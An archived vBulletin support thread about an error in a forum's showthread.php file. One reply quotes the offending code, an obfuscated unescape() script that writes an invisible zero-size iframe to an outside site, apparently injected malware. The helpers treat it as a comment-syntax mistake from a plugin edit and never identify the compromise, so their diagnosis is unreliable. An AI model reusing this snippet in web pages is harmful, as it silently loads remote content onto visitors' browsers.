The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
error showthread.php
hi all
I get error in showthread.php and on line 323 PHP Code:
|
#2
|
||||
|
||||
Which version of vbulletin are you running? I have 3.6.8 on my main site and 3.7 on my test site and that is not line 323 in showthread in either of them. I think we need to see what is around that line in order to help, so knowing the version, or having you post more of your showwthread.php script, would help a lot.
|
#3
|
|||
|
|||
I use 3.6.8 version
I upload my showthread.php |
#4
|
||||
|
||||
OK, but you must have done some sort of editing of the file as "else" is not line 323 on an unmodified 2.6.8 showthread.php script. So, we need to see your code around that line in order to see what is going on.
|
#5
|
|||
|
|||
my englısh ıs not so good and you say me where will I edit and I can edit
|
#6
|
|||
|
|||
Can you please provide the URL to this problem?
|
#7
|
|||
|
|||
|
#8
|
||||
|
||||
I just downloaded your page... line 323 is not an else statement. You have a "<!--" there and then you commented out the end of the commenting.
This is what you have: Code:
// workaround for header redirect issue from forms with enctype in IE // (use a scrollIntoView javascript call in the <body><!-- o --><script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script><!-- c --> onload event) $onload = ''; Code:
// workaround for header redirect issue from forms with enctype in IE // (use a scrollIntoView javascript call in the <body> onload event) $onload = ''; I don't know what the purpose of all that other stuff is. |
#9
|
|||
|
|||
I dont know too I use some plugıns cmps , photoplog , arcade
|
#10
|
||||
|
||||
Then I suggest you look for the one that had you edit the showthread.php file and verify that you did it correctly. Whatever you did in that file is *not* correct because you have the start of a comment and then you commented out the end of the comment line. You can't do that or you will get a page error, as you saw. If you have a "<!--" you need to have a "-->" at the end. "//" says Disregard This Line, so your end comment is being disregarded.
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|